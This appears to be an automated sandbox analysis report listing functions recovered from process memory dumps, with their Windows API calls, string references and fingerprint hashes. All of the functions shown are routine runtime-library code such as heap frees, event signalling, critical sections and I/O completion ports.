Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 13a3529d86c17c698e0ede22a454398bcb9d38b27a079c70c443a72d00f0daf6
Instruction ID: 4f8d1e38c04fc87f4843a68a5ffef344634c26046e8b3c2f558cea8dcef5bce7
Opcode Fuzzy Hash: 13a3529d86c17c698e0ede22a454398bcb9d38b27a079c70c443a72d00f0daf6
Instruction Fuzzy Hash: 38D01232008208AFCF902BE0C90CB6F3F38EB0A347F088440F70A8E051CB7286008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C17C2C, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C17D4C,00D4166C), ref: 00C17C31
UnhandledExceptionFilter.KERNEL32(00C17D4C,?,00C17D4C,00D4166C), ref: 00C17C3A
GetCurrentProcess.KERNEL32(C0000409,?,00C17D4C,00D4166C), ref: 00C17C45
TerminateProcess.KERNEL32(00000000,?,00C17D4C,00D4166C), ref: 00C17C4C

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e632af24151c627a347615eafbc3880d63460bb7d8ebfcfc7ade6652d3b4089c
Instruction ID: 5bf3411679f0a9500f914ada1bb4a4eeae051721775ad76d9664b988146ac33b
Opcode Fuzzy Hash: e632af24151c627a347615eafbc3880d63460bb7d8ebfcfc7ade6652d3b4089c
Instruction Fuzzy Hash: CDD00272448248BBDB203BE2ED2DB6D3F28FB0A656F044414F71EC6461DBB19C918B65

Uniqueness

Uniqueness Score: -1.00%

Function 00A91BE0, Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 419COMMON

Download Yara Rule

APIs

Part of subcall function 00C16EC2: RtlEnterCriticalSection.NTDLL(00DB9A1C), ref: 00C16ECD
Part of subcall function 00C16EC2: RtlLeaveCriticalSection.NTDLL(00DB9A1C), ref: 00C16F0A

__Init_thread_footer.LIBCMT ref: 00A9243E

Strings

!, xrefs: 00A91FB9
A, xrefs: 00A92221
C, xrefs: 00A922B8
$, xrefs: 00A920A0
B, xrefs: 00A9226E
0, xrefs: 00A920ED
#, xrefs: 00A92053
E, xrefs: 00A9232E
2, xrefs: 00A92187
F, xrefs: 00A92369
4, xrefs: 00A9248D
", xrefs: 00A92006
D, xrefs: 00A922F3
, xrefs: 00A91F6C
1, xrefs: 00A9213A
@, xrefs: 00A921D4

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave
String ID: $!$"$#$$$0$1$2$4$@$A$B$C$D$E$F
API String ID: 3960375172-1916289598
Opcode ID: edbb976181161f7b03cb21d91e6ac33c7e020b45f0b9794a02e8b1e5a38fd03d
Instruction ID: 3398586150a1f5d07892e4b79663d1fcc6f490879faaa1d2a5957a9e16699884
Opcode Fuzzy Hash: edbb976181161f7b03cb21d91e6ac33c7e020b45f0b9794a02e8b1e5a38fd03d
Instruction Fuzzy Hash: 3632D0B0E053689EEB60DF64C9597DDBBF0AB05308F1441D9D458AB2C2D7BA0E889F61

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D9A0, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 168synchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A8D9B6
GetLastError.KERNEL32 ref: 00A8D9C8
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A8D9FB
GetLastError.KERNEL32 ref: 00A8DA0D
GetLastError.KERNEL32(?,?,?), ref: 00A8DA64
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A8DAA7
SetEvent.KERNEL32(?,00DA8488,00C6B06C,?,00000000,00C562FD,000000FF), ref: 00A8DB24
SetEvent.KERNEL32(00000000), ref: 00A8DB3D
SleepEx.KERNEL32(000000FF,00000001), ref: 00A8DB47

Strings

thread.entry_event, xrefs: 00A8DAB9
thread, xrefs: 00A8DAD3
thread.exit_event, xrefs: 00A8DAC6

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Event$ErrorLast$Create$ObjectSingleSleepWait
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 1625995971-3017686385
Opcode ID: 8fbec10586eb07d26c0f994a7d3fb8783ecb4c1c85fe3a454b7839cbfa19ce78
Instruction ID: 566b44c8e0a63f71b8f8830ae9e075617ba5e32ed75a4ad8bbd262a720555113
Opcode Fuzzy Hash: 8fbec10586eb07d26c0f994a7d3fb8783ecb4c1c85fe3a454b7839cbfa19ce78
Instruction Fuzzy Hash: C4518075A00214AFDB10EF64CD85B9EBBB4EF44751F244169ED15EB3D0DBB0AD448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8DFD0, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 368timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32(?,?,00000001,00000000,00000000,00000000,00DA8488), ref: 00A8E024
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001), ref: 00A8E04A
GetLastError.KERNEL32 ref: 00A8E054
CloseHandle.KERNEL32(?), ref: 00A8E084
GetQueuedCompletionStatus.KERNEL32(00000000,00000000,?,?,?), ref: 00A8E19E
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,00DA8488,?,00000001), ref: 00A8E276
GetLastError.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00DA8488), ref: 00A8E280
TlsGetValue.KERNEL32 ref: 00A8E31B
TlsSetValue.KERNEL32(?), ref: 00A8E32E

Part of subcall function 00A8E580: RtlEnterCriticalSection.NTDLL(?), ref: 00A8E5CA
Part of subcall function 00A8E580: SetWaitableTimer.KERNEL32(00000001,?,000493E0,?,?,?,?,?), ref: 00A8E67A
Part of subcall function 00A8E580: RtlLeaveCriticalSection.NTDLL(?), ref: 00A8E690
Part of subcall function 00A8E580: SetLastError.KERNEL32(00000000,00DA8488,00000000,?,?), ref: 00A8E6AD

TlsSetValue.KERNEL32(?,?,00000000,?), ref: 00A8E375

Part of subcall function 00A8E580: GetQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,?), ref: 00A8E6C5
Part of subcall function 00A8E580: GetLastError.KERNEL32(?,?), ref: 00A8E6CD
Part of subcall function 00A8E580: PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,?,?), ref: 00A8E856
Part of subcall function 00A8E580: GetLastError.KERNEL32(?,?), ref: 00A8E860

Strings

pqcs, xrefs: 00A8E20E, 00A8E3B9

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CompletionErrorLastQueuedStatus$PostValue$CriticalSectionTimerWaitable$CloseEnterHandleLeave
String ID: pqcs
API String ID: 11973285-2559862021
Opcode ID: aca8fc44874bb1b8e48c70363b103e1436fe424eef484bf15bd84eec0d9aa70e
Instruction ID: 72725a0eedaf0b06d2615bb6017f2189078c51143285cc67ca2cea9e96cf885d
Opcode Fuzzy Hash: aca8fc44874bb1b8e48c70363b103e1436fe424eef484bf15bd84eec0d9aa70e
Instruction Fuzzy Hash: 1BD18CB1A0061AEFDB15DFA5D844BEEBBF8FF48314F144129E805E7650EB75A904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D862B70, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6D862BB4

Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D8648BF
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D8648D1
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D8648E3
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D8648F5
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D864907
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D864919
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D86492B
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D86493D
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D86494F
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D864961
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D864973
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D864985
Part of subcall function 6D8648A2: _free.LIBCMT ref: 6D864997

_free.LIBCMT ref: 6D862BA9

Part of subcall function 6D855D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D71
Part of subcall function 6D855D5B: GetLastError.KERNEL32(00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D83

_free.LIBCMT ref: 6D862BCB
_free.LIBCMT ref: 6D862BE0
_free.LIBCMT ref: 6D862BEB
_free.LIBCMT ref: 6D862C0D
_free.LIBCMT ref: 6D862C20
_free.LIBCMT ref: 6D862C2E
_free.LIBCMT ref: 6D862C39
_free.LIBCMT ref: 6D862C71
_free.LIBCMT ref: 6D862C78
_free.LIBCMT ref: 6D862C95
_free.LIBCMT ref: 6D862CAD

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 22716f6d9377db1137545c5fe8a25ec3d63ffb9b9f45a51ef26d6189f1d47bb0
Instruction ID: 28982001b405a85fd93c2f42848075aba163931183eadb370ee3399c42ac2b45
Opcode Fuzzy Hash: 22716f6d9377db1137545c5fe8a25ec3d63ffb9b9f45a51ef26d6189f1d47bb0
Instruction Fuzzy Hash: 87314132508382EFE7219F39D84CB6673E9EF01325F114DA9E599D7160DF78E9908B20

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C958, Relevance: 19.6, APIs: 13, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C3C975

Part of subcall function 00C35F88: HeapFree.KERNEL32(00000000,00000000,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?), ref: 00C35F9E
Part of subcall function 00C35F88: GetLastError.KERNEL32(?,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?,?), ref: 00C35FB0

_free.LIBCMT ref: 00C3C987
_free.LIBCMT ref: 00C3C999
_free.LIBCMT ref: 00C3C9AB
_free.LIBCMT ref: 00C3C9BD
_free.LIBCMT ref: 00C3C9CF
_free.LIBCMT ref: 00C3C9E1
_free.LIBCMT ref: 00C3C9F3
_free.LIBCMT ref: 00C3CA05
_free.LIBCMT ref: 00C3CA17
_free.LIBCMT ref: 00C3CA29
_free.LIBCMT ref: 00C3CA3B
_free.LIBCMT ref: 00C3CA4D

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fa039e4a046fbfe9df6cde6fa77c78d32c9f5b6f508043ad393c43085b1fc6f8
Instruction ID: 3fa9a49e98d116bfacc3cdfcd68cb4a1954c337274709626b5685ae7b05e13e7
Opcode Fuzzy Hash: fa039e4a046fbfe9df6cde6fa77c78d32c9f5b6f508043ad393c43085b1fc6f8
Instruction Fuzzy Hash: C0215372928704AFCA20EB68F8C1C0E73EDAA19311FA44D05F455E3691CF30FD806B64

Uniqueness

Uniqueness Score: -1.00%

Function 00A8DC50, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 295COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(00DA8488,00000001,00000001,00000001,00DA8488), ref: 00A8DCA1
GetLastError.KERNEL32 ref: 00A8DCAB
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A8DDCB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A8DDD8
CloseHandle.KERNEL32(00000000,00000010), ref: 00A8DE45
PostQueuedCompletionStatus.KERNEL32(00000000,00000001,00000001,00000001), ref: 00A8DEF2
GetLastError.KERNEL32 ref: 00A8DEFC
RtlDeleteCriticalSection.NTDLL(00DA8488), ref: 00A8DF4C

Strings

mutex, xrefs: 00A8DE6F
pqcs, xrefs: 00A8DCD5, 00A8DFAA
iocp, xrefs: 00A8DE7C

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CompletionErrorLast$PostQueuedStatus$CloseCreateCriticalDeleteHandlePortSection
String ID: iocp$mutex$pqcs
API String ID: 3073728563-2646206598
Opcode ID: 5d22e74985b6e44cf7271baa649c399b9cfd802887a1a9ebd940c72f35a79fc6
Instruction ID: 76ce63cf6dbff5e924b9615502bff276e8b9d983e0a78d1ab27751987fe37082
Opcode Fuzzy Hash: 5d22e74985b6e44cf7271baa649c399b9cfd802887a1a9ebd940c72f35a79fc6
Instruction Fuzzy Hash: DAA1AAB0A007059FDB20EF25D844B9BBBF8FF05714F00462DE95697790EBB5A948CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8E580, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 282timeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00A8E5CA
SetWaitableTimer.KERNEL32(00000001,?,000493E0,?,?,?,?,?), ref: 00A8E67A
RtlLeaveCriticalSection.NTDLL(?), ref: 00A8E690
SetLastError.KERNEL32(00000000,00DA8488,00000000,?,?), ref: 00A8E6AD
GetQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,?), ref: 00A8E6C5
GetLastError.KERNEL32(?,?), ref: 00A8E6CD
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,?,?), ref: 00A8E7E9
GetLastError.KERNEL32(?,?), ref: 00A8E7F7
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,?,?), ref: 00A8E856
GetLastError.KERNEL32(?,?), ref: 00A8E860

Strings

pqcs, xrefs: 00A8E8EE

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorLast$CompletionQueuedStatus$CriticalPostSection$EnterLeaveTimerWaitable
String ID: pqcs
API String ID: 4194479484-2559862021
Opcode ID: c345a178bc0e8863140c57c7f42724c67c9f3a71cf63f9d5e6866e52a8a0e577
Instruction ID: 33b757e0865c7e0a9f847fbfebed70aa6e822b6e64e429c7567f24ab23ace3ad
Opcode Fuzzy Hash: c345a178bc0e8863140c57c7f42724c67c9f3a71cf63f9d5e6866e52a8a0e577
Instruction Fuzzy Hash: 22B18E70A00609DFDB25DFA5C984BAEBBF4FF18314F104569E805EB640E774AD44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D7AF, Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C3D7E8

Part of subcall function 00C35F88: HeapFree.KERNEL32(00000000,00000000,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?), ref: 00C35F9E
Part of subcall function 00C35F88: GetLastError.KERNEL32(?,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?,?), ref: 00C35FB0

Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C975
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C987
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C999
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C9AB
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C9BD
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C9CF
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C9E1
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3C9F3
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3CA05
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3CA17
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3CA29
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3CA3B
Part of subcall function 00C3C958: _free.LIBCMT ref: 00C3CA4D

_free.LIBCMT ref: 00C3D80A
_free.LIBCMT ref: 00C3D81F
_free.LIBCMT ref: 00C3D82A
_free.LIBCMT ref: 00C3D84C
_free.LIBCMT ref: 00C3D85F
_free.LIBCMT ref: 00C3D86D
_free.LIBCMT ref: 00C3D878
_free.LIBCMT ref: 00C3D8B0
_free.LIBCMT ref: 00C3D8B7
_free.LIBCMT ref: 00C3D8D4
_free.LIBCMT ref: 00C3D8EC

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9617fcf157631513bc9d33b41731f2e65f67fef4340d02396b1c75607869dbad
Instruction ID: 4eb54751dc932c0c0ef054f9d07b3d468fe7518040a1b6894779410cef4356f8
Opcode Fuzzy Hash: 9617fcf157631513bc9d33b41731f2e65f67fef4340d02396b1c75607869dbad
Instruction Fuzzy Hash: 9A316B31A247059FEB21AA78E845B5AB3E8BF14310F104929F46AD71D1DF30FE84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2AA0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AB2ADD
std::_Lockit::_Lockit.LIBCPMT ref: 00AB2AFD
std::_Lockit::~_Lockit.LIBCPMT ref: 00AB2B1D
std::_Facet_Register.LIBCPMT ref: 00AB2C78
std::_Lockit::~_Lockit.LIBCPMT ref: 00AB2C90
Concurrency::cancel_current_task.LIBCPMT ref: 00AB2CA9
Concurrency::cancel_current_task.LIBCPMT ref: 00AB2CAE
Concurrency::cancel_current_task.LIBCPMT ref: 00AB2CB3

Strings

true, xrefs: 00AB2C49
false, xrefs: 00AB2C23

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
String ID: false$true
API String ID: 3742692055-2658103896
Opcode ID: a438364e629413ea04b1f552e1c269b461a054f470727bbaa2a1ccf82733c595
Instruction ID: 42a0d4ba39d2b69c0ba697003e2ef59ccd6e56668be127353522f0b4c54cf215
Opcode Fuzzy Hash: a438364e629413ea04b1f552e1c269b461a054f470727bbaa2a1ccf82733c595
Instruction Fuzzy Hash: 1B512070A00304DFDB24DF64C951BAEBBF8EF05710F04496EE815AB392DB72A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ABCAA0, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00ABCB61
SetEvent.KERNEL32(00000000), ref: 00ABCBF1
SetEvent.KERNEL32(00000000), ref: 00ABCC81
SetEvent.KERNEL32(00000000), ref: 00ABCD26
SetEvent.KERNEL32(00000000), ref: 00ABCDB6
SetEvent.KERNEL32(00000000), ref: 00ABCE46
SetEvent.KERNEL32(00000000), ref: 00ABCECE
SetEvent.KERNEL32(00000000), ref: 00ABCF53
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00ABCFB2

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: c5854a852b4d596ea214df4782f3b30a2782f03a2e847b47441fd851e2cd21e9
Instruction ID: a9a9c862ac952b2b37df6d96b75d963ac13fa5780741df97aee9af31a06ab4be
Opcode Fuzzy Hash: c5854a852b4d596ea214df4782f3b30a2782f03a2e847b47441fd851e2cd21e9
Instruction Fuzzy Hash: FFE1C130A01345CFDB268B38C544BBDBBB9AF46735F19405CE85AA7292DB34DD42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ABDA30, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00ABDAF1
SetEvent.KERNEL32(00000000), ref: 00ABDB81
SetEvent.KERNEL32(00000000), ref: 00ABDC11
SetEvent.KERNEL32(00000000), ref: 00ABDCB6
SetEvent.KERNEL32(00000000), ref: 00ABDD46
SetEvent.KERNEL32(00000000), ref: 00ABDDD6
SetEvent.KERNEL32(00000000), ref: 00ABDE5E
SetEvent.KERNEL32(00000000), ref: 00ABDEE3
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00ABDF42

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: 8f159e797cb8f9ed8a6968e6db00d65aed56301b3d3f4a36c6230dad01e22663
Instruction ID: 57d322ea1d3e9c15237126d0a427e1f384b1d7a3384a8228605d3ba0677d3f64
Opcode Fuzzy Hash: 8f159e797cb8f9ed8a6968e6db00d65aed56301b3d3f4a36c6230dad01e22663
Instruction Fuzzy Hash: 28E1F630A012059FDF268F28C6447BDBBB9EF46724F59401CE8569B292EB34DC46DBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00ABC430, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00ABC4F1
SetEvent.KERNEL32(00000000), ref: 00ABC581
SetEvent.KERNEL32(00000000), ref: 00ABC611
SetEvent.KERNEL32(00000000), ref: 00ABC6B6
SetEvent.KERNEL32(00000000), ref: 00ABC746
SetEvent.KERNEL32(00000000), ref: 00ABC7D6
SetEvent.KERNEL32(00000000), ref: 00ABC85E
SetEvent.KERNEL32(00000000), ref: 00ABC8E3
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00ABC942

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: d04716aa01e539792135827aab39a4aff316dd02f03a07909a29e1f372da46c7
Instruction ID: 47305c1e001279a00dd39f69a0d3d4a271b342a6ebe06f256c50ae35a4e5b8a3
Opcode Fuzzy Hash: d04716aa01e539792135827aab39a4aff316dd02f03a07909a29e1f372da46c7
Instruction Fuzzy Hash: 60E1F430A012058FEB268F28C559FADBBB9AF45735F1A401CD859A7392DB34DD42DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00ABD500, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00ABD5C1
SetEvent.KERNEL32(00000000), ref: 00ABD651
SetEvent.KERNEL32(00000000), ref: 00ABD6E1
SetEvent.KERNEL32(00000000), ref: 00ABD786
SetEvent.KERNEL32(00000000), ref: 00ABD816
SetEvent.KERNEL32(00000000), ref: 00ABD8A6
SetEvent.KERNEL32(00000000), ref: 00ABD92E
SetEvent.KERNEL32(00000000), ref: 00ABD9B3
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00ABDA12

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: 1729c409a33169197b28ca5c8d559fd1e3ae44cfcf96f2c9d38af212130f8742
Instruction ID: 8e7c5f1a32625c310de01438127e351deff36f5da1038b5215cdce968e88be67
Opcode Fuzzy Hash: 1729c409a33169197b28ca5c8d559fd1e3ae44cfcf96f2c9d38af212130f8742
Instruction Fuzzy Hash: 4BE10630A012058FDB2A8F68C5447ADBBB9EF85725F19401CD85AA77A2EB35DC46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00ABCFD0, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00ABD091
SetEvent.KERNEL32(00000000), ref: 00ABD121
SetEvent.KERNEL32(00000000), ref: 00ABD1B1
SetEvent.KERNEL32(00000000), ref: 00ABD256
SetEvent.KERNEL32(00000000), ref: 00ABD2E6
SetEvent.KERNEL32(00000000), ref: 00ABD376
SetEvent.KERNEL32(00000000), ref: 00ABD3FE
SetEvent.KERNEL32(00000000), ref: 00ABD483
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00ABD4E2

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: ffbd511eeb9e72be797818d500d86ee4afa80cdd01b1714f37861afb197449c2
Instruction ID: cfbf423fade9c23427b7dad29f96f7eccfee6932e58e84ed7d0cf0d8c57d5fe3
Opcode Fuzzy Hash: ffbd511eeb9e72be797818d500d86ee4afa80cdd01b1714f37861afb197449c2
Instruction Fuzzy Hash: 97E11630E016458FDF268F28C544BADBBB9EF56714F59401CD81A9B392EB39EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ABB8E0, Relevance: 13.9, APIs: 9, Instructions: 406COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00ABB9A8
SetEvent.KERNEL32(00000000), ref: 00ABBA39
SetEvent.KERNEL32(00000000), ref: 00ABBACA
SetEvent.KERNEL32(00000000), ref: 00ABBB70
SetEvent.KERNEL32(00000000), ref: 00ABBC01
SetEvent.KERNEL32(00000000), ref: 00ABBC92
SetEvent.KERNEL32(00000000), ref: 00ABBD1B
SetEvent.KERNEL32(00000000), ref: 00ABBDA1
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00ABBE00

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: a3c1c3096cbd295aca0ca86b48b6d6b1d095890d22321880fe50ce77021c9453
Instruction ID: 068b5367fb1009d7054dd575cddc17e0b1d5246cdf6c354229c3911ede234a23
Opcode Fuzzy Hash: a3c1c3096cbd295aca0ca86b48b6d6b1d095890d22321880fe50ce77021c9453
Instruction Fuzzy Hash: E1F10530E106098FDB25CB29C584BADBBB9FF56314F19411CD45A972A2CBB8DC42CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8389F0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6D838A27
___except_validate_context_record.LIBVCRUNTIME ref: 6D838A2F
_ValidateLocalCookies.LIBCMT ref: 6D838AB8
__IsNonwritableInCurrentImage.LIBCMT ref: 6D838AE3
_ValidateLocalCookies.LIBCMT ref: 6D838B38

Strings

csm, xrefs: 6D838ACD

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
